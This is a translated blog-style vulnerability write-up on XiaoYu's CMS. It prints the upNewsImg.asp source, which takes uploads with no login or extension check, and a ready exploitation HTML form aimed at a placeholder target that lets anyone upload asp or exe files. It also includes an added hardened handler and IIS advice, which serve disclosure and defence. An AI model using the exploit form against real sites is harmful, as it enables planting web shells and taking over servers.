(Why does the author leave a backdoor?)
XiaoYu's website content management system:
Currently the most powerful whole-site system. It includes the modules that general websites require, such as news articles, downloads, movies, pictures, and music. The modules are independent yet closely related to each other, support unlimited category levels, can be called freely, and support templates. The front end is generated as static HTML to save system resources to the maximum extent. The best choice for large and medium-sized portal websites.
The content pages are generated as static HTML, which is relatively safe. The admin back end does not seem to have much of a problem either.
But go to the upload directory and you will find two files:
Uploadset.asp and upNewsImg.asp
Uploadset.asp performs verification, but upNewsImg.asp has no restrictions. Let's take a look at the source code:
CODE:
<link rel="stylesheet" type="text/css" href="../admin/admin.css">
<script language="JavaScript">
<!-- Hide from older browsers...
// Function to add pic
function Addpic(imagePath) {
    window.opener.frames.message.focus();
    window.opener.frames.message.document.execCommand('InsertImage', false, imagePath);
}
// -->
</script>
<% Server.ScriptTimeout = 1900 %>
<%
UpFilePath = "NewsIMG/"
fileweb = "UPLOAD/"
nameset = 1
pathset = 0
Dim i
i = 1
%>
<%
' Builds a file name from the current timestamp
Function makefilename(fname)
    fname = Now()
    fname = Replace(fname, "-", "")
    fname = Replace(fname, " ", "")
    fname = Replace(fname, ":", "")
    makefilename = fname
End Function
%>
<!-- #include FILE="upload_5xsoft.inc" -->
<%
' Note: nothing in this file checks a login or session before handling the upload
Dim upload, file, formName, iCount
Dim url, url1
Set upload = New upload_5xSoft
iCount = 0
For Each formName In upload.file ' lists all uploaded files
    Set file = upload.file(formName) ' generate a file object
    If file.FileSize > 0 Then ' if FileSize > 0, file data exists
        ' The saved extension comes straight from the client-supplied file name
        fname = makefilename(Now()) & iCount & "." & GetExtendName(file.FileName)
        file.SaveAs Server.MapPath(UpFilePath & fname) ' save the file
        iCount = iCount + 1
        Response.Write "image" & i & " <input type=""text"" name=" & i & " size=""55"" style=""border-style: solid; border-width: 1"" value=""../" & fileweb & UpFilePath & fname & """><br>[<a href=# onclick=""Addpic('../" & fileweb & UpFilePath & fname & "')"">click here to add the image " & i & " to the Editor</a>]<br>"
        i = i + 1
        Set file = Nothing
    End If
Next
Set upload = Nothing ' delete this object
' Returns the last characters of the file name as the extension; no allow-list is applied
Function GetExtendName(FileName)
    Dim ExtName
    ExtName = LCase(FileName)
    ExtName = Right(ExtName, 3)
    ExtName = Right(ExtName, 3 - InStr(ExtName, "."))
    GetExtendName = ExtName
End Function
%>
Haha, you can build an upload page yourself and upload files directly, even an exe file, not to mention asp or anything else.
After the upload, the page returns the address of the saved file. This is a backdoor left by the author.
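For comparison, a hardened version of the same handler, added here as an example and not taken from the CMS or its author. It reuses the upload_5xSoft calls shown above; the `Session("admin")` key, the 2 MB limit and the image allow-list are assumptions.

```asp
<!-- #include file="upload_5xsoft.inc" -->
<%
' Added example, not the CMS author's code.
' ASSUMPTION: the admin login sets Session("admin"); the real CMS may use another key.
If Session("admin") = "" Then
    Response.Status = "403 Forbidden"
    Response.End
End If

Const UpFilePath = "NewsIMG/"
Const FileWeb = "UPLOAD/"
Const MaxBytes = 2097152 ' 2 MB, constructed limit

' Return the extension only if it is on the image allow-list, otherwise "".
Function SafeImageExt(fileName)
    Dim pos, ext
    SafeImageExt = ""
    pos = InStrRev(fileName, ".")
    If pos = 0 Or pos = Len(fileName) Then Exit Function
    ext = LCase(Mid(fileName, pos + 1))
    Select Case ext
        Case "jpg", "jpeg", "gif", "png"
            SafeImageExt = ext
    End Select
End Function

' Server-generated name: timestamp digits plus a counter, nothing from the client.
Function MakeFileName(n, ext)
    Dim t : t = Now()
    MakeFileName = Year(t) & Right("0" & Month(t), 2) & Right("0" & Day(t), 2) & _
                   Right("0" & Hour(t), 2) & Right("0" & Minute(t), 2) & _
                   Right("0" & Second(t), 2) & n & "." & ext
End Function

Dim upload, file, formName, ext, fname, iCount
Set upload = New upload_5xSoft
iCount = 0
For Each formName In upload.file
    Set file = upload.file(formName)
    ext = SafeImageExt(file.FileName)
    If file.FileSize > 0 And file.FileSize <= MaxBytes And ext <> "" Then
        fname = MakeFileName(iCount, ext)
        file.SaveAs Server.MapPath(UpFilePath & fname)
        iCount = iCount + 1
        Response.Write Server.HTMLEncode("../" & FileWeb & UpFilePath & fname) & "<br>"
    End If
    Set file = Nothing
Next
Set upload = Nothing
%>
```

Setting the upload directory's execute permissions to None in IIS adds a second layer in case a check like this is ever bypassed.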
Exploitation file:
CODE:
<html>
<head>
<title>File Upload</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#D6EF7E" text="#000000">
<form name="form1" method="post" action="http://www.target.com/upload/upnewsimg.asp" enctype="multipart/form-data">
<input type="hidden" name="act" value="upload">
<div align="center">
<center>
<table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102">
<tr>
<th height="16" align="left" valign="middle">
<div align="center">
<b>upload images</b>
</div>
</th>
</tr>
<tr align="left" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="1" valign="top">
<input type="file" name="file1" style="width: 200" class="tx1">
</td>
</tr>
<tr align="center" valign="middle">
<td align="left" id="upid" height="5" bgcolor="#FFFFFF">
</td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="28">
<input type="submit" name="Submit" value="· submit ·" class="bt">
<input type="reset" name="Submit2" value="· zhongzhi ·" class="bt"></td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td height="14" bgcolor="#FFFFFF"></td>
</tr>
</table>
</center>
</div>
</form>
</body>
</html>
Fun.
My Blog http://hhuai.cn
Article: Bad
Source: evil baboons Information Security Team